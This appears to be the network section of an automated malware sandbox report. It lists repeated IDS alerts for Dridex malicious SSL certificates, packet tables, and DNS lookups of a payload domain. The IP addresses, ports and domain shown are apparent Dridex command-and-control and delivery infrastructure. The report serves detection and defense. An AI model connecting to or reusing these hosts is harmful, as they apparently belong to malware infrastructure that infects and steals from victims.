                                                                                                                                                            01/12/21-07:41:16.526262TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493205.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:16.526262TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493205.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:17.549895TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932277.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:18.061063TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932380.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:18.596816TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493245.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:18.596816TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493245.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:19.650753TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932677.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:20.246706TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932780.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:21.069741TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493285.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:21.069741TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493285.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:22.122326TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933077.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:22.658452TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933180.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:23.182733TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493325.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:23.182733TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493325.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:24.215425TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933477.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:24.739077TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933580.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:25.248721TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493365.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:25.248721TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493365.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:26.255388TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933877.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:26.764994TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933980.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:27.274574TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493405.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:27.274574TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493405.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:28.283557TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934277.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:28.807811TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934380.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:29.329163TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493445.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:29.329163TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493445.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:30.358276TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934677.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:30.871503TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934780.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:31.379307TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493485.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:31.379307TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493485.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:32.385092TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935077.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:32.895054TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935180.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:33.403843TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493525.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:33.403843TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493525.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:34.450143TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935477.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:35.332941TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935580.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:35.858167TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493565.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:35.858167TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493565.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:36.894236TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935877.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:37.427318TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935980.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:37.960157TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493605.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:37.960157TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493605.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:39.306800TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936277.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:39.827898TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936380.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:40.345753TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493645.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:40.345753TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493645.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:41.457152TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936677.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:42.008408TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936780.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:42.533262TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493685.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:42.533262TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493685.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:43.569616TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937077.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:44.092876TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937180.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:44.599102TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493725.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:44.599102TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493725.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:45.630964TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937477.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:46.144235TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937580.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:46.650029TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493765.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:46.650029TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493765.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:47.679960TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937877.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:48.204647TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937980.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:48.713113TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493805.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:48.713113TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493805.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:49.740036TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938277.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:50.282849TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938380.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:50.810903TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493845.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:50.810903TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493845.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:51.841462TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938677.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:52.369234TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938780.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:52.877261TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493885.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:52.877261TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493885.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:53.904021TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939077.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:54.426840TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939180.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:54.948754TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493925.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:54.948754TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493925.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:55.980370TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939477.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:56.511843TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939580.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:57.028666TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493965.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:57.028666TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493965.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:58.081725TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939877.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:58.590307TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939980.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:59.116435TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494005.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:59.116435TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494005.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:42:00.176278TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434940277.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:42:00.709693TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084940380.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:42:01.219815TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494045.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:42:01.219815TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494045.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:42:02.247073TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434940677.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:42:02.755637TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084940780.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:42:03.281436TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494085.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:42:03.281436TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494085.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:42:04.306580TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434941077.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:42:04.834674TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084941180.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:42:05.352300TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494125.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:42:05.352300TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494125.100.228.233192.168.2.22

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jan 12, 2021 07:39:44.707056999 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:44.757510900 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:44.757617950 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:44.770828962 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:44.821204901 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:44.823672056 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:44.823704958 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:44.823832989 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:44.833878040 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:44.884164095 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:44.884217024 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:44.884305000 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:45.110754967 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:45.161001921 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:45.866411924 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:45.866445065 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:45.866467953 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:45.866489887 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:45.866514921 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:45.866539001 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:45.866561890 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:45.866584063 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:45.866626024 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:45.868046045 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.032404900 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.032433033 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.032552958 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.032577991 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.032624006 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.033785105 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.033813000 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.033829927 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.033843994 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.033865929 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.034933090 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.034965038 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.035003901 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.035018921 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.036092043 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.036118031 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.036149025 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.036163092 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.037291050 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.037318945 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.037349939 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.037360907 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.038445950 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.038475037 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.038499117 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.038508892 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.039661884 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.039689064 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.039717913 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.039731026 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.040788889 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.040817022 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.040843964 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.041995049 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.042027950 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.042037964 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.042049885 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.042066097 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.200309038 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.200340033 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.200469017 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.200494051 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.200530052 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.200572014 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.201702118 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.201731920 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.201927900 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.202847004 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.202879906 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.202986956 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.204013109 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.204041004 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.204138041 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.205204964 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.205235004 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.205296993 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.206374884 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.206408024 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.206459999 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.207567930 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.207600117 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.207640886 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.208791018 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.208820105 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.208929062 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.209887028 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.209913015 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.210000038 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.367963076 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.367995977 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.368151903 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.368413925 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.368429899 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.368470907 CET49165443192.168.2.22104.27.153.52
                                                                                                                                                            Jan 12, 2021 07:39:46.369112015 CET44349165104.27.153.52192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:46.369132042 CET44349165104.27.153.52192.168.2.22

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jan 12, 2021 07:39:44.630251884 CET5219753192.168.2.228.8.8.8
                                                                                                                                                            Jan 12, 2021 07:39:44.698278904 CET53521978.8.8.8192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:52.469271898 CET5309953192.168.2.228.8.8.8
                                                                                                                                                            Jan 12, 2021 07:39:52.517098904 CET53530998.8.8.8192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:39:52.769494057 CET5283853192.168.2.228.8.8.8
                                                                                                                                                            Jan 12, 2021 07:39:52.825742006 CET53528388.8.8.8192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:40:29.825201035 CET6120053192.168.2.228.8.8.8
                                                                                                                                                            Jan 12, 2021 07:40:29.873004913 CET53612008.8.8.8192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:40:29.904664040 CET4954853192.168.2.228.8.8.8
                                                                                                                                                            Jan 12, 2021 07:40:29.952553034 CET53495488.8.8.8192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:40:30.848588943 CET5562753192.168.2.228.8.8.8
                                                                                                                                                            Jan 12, 2021 07:40:30.896363974 CET53556278.8.8.8192.168.2.22
                                                                                                                                                            Jan 12, 2021 07:40:30.908526897 CET5600953192.168.2.228.8.8.8
                                                                                                                                                            Jan 12, 2021 07:40:30.956259012 CET53560098.8.8.8192.168.2.22

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                            Jan 12, 2021 07:39:44.630251884 CET192.168.2.228.8.8.80x2c09Standard query (0)education.scrollx.inA (IP address)IN (0x0001)

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                            Jan 12, 2021 07:39:44.698278904 CET8.8.8.8192.168.2.220x2c09No error (0)education.scrollx.in104.27.153.52A (IP address)IN (0x0001)
                                                                                                                                                            Jan 12, 2021 07:39:44.698278904 CET8.8.8.8192.168.2.220x2c09No error (0)education.scrollx.in172.67.211.199A (IP address)IN (0x0001)
                                                                                                                                                            Jan 12, 2021 07:39:44.698278904 CET8.8.8.8192.168.2.220x2c09No error (0)education.scrollx.in104.27.152.52A (IP address)IN (0x0001)
                                                                                                                                                            Jan 12, 2021 07:40:30.896363974 CET8.8.8.8192.168.2.220xcccdNo error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                                                                                                            Jan 12, 2021 07:40:30.896363974 CET8.8.8.8192.168.2.220xcccdNo error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                                                                                                            Jan 12, 2021 07:40:30.956259012 CET8.8.8.8192.168.2.220x5e1eNo error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                                                                                                            Jan 12, 2021 07:40:30.956259012 CET8.8.8.8192.168.2.220x5e1eNo error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)

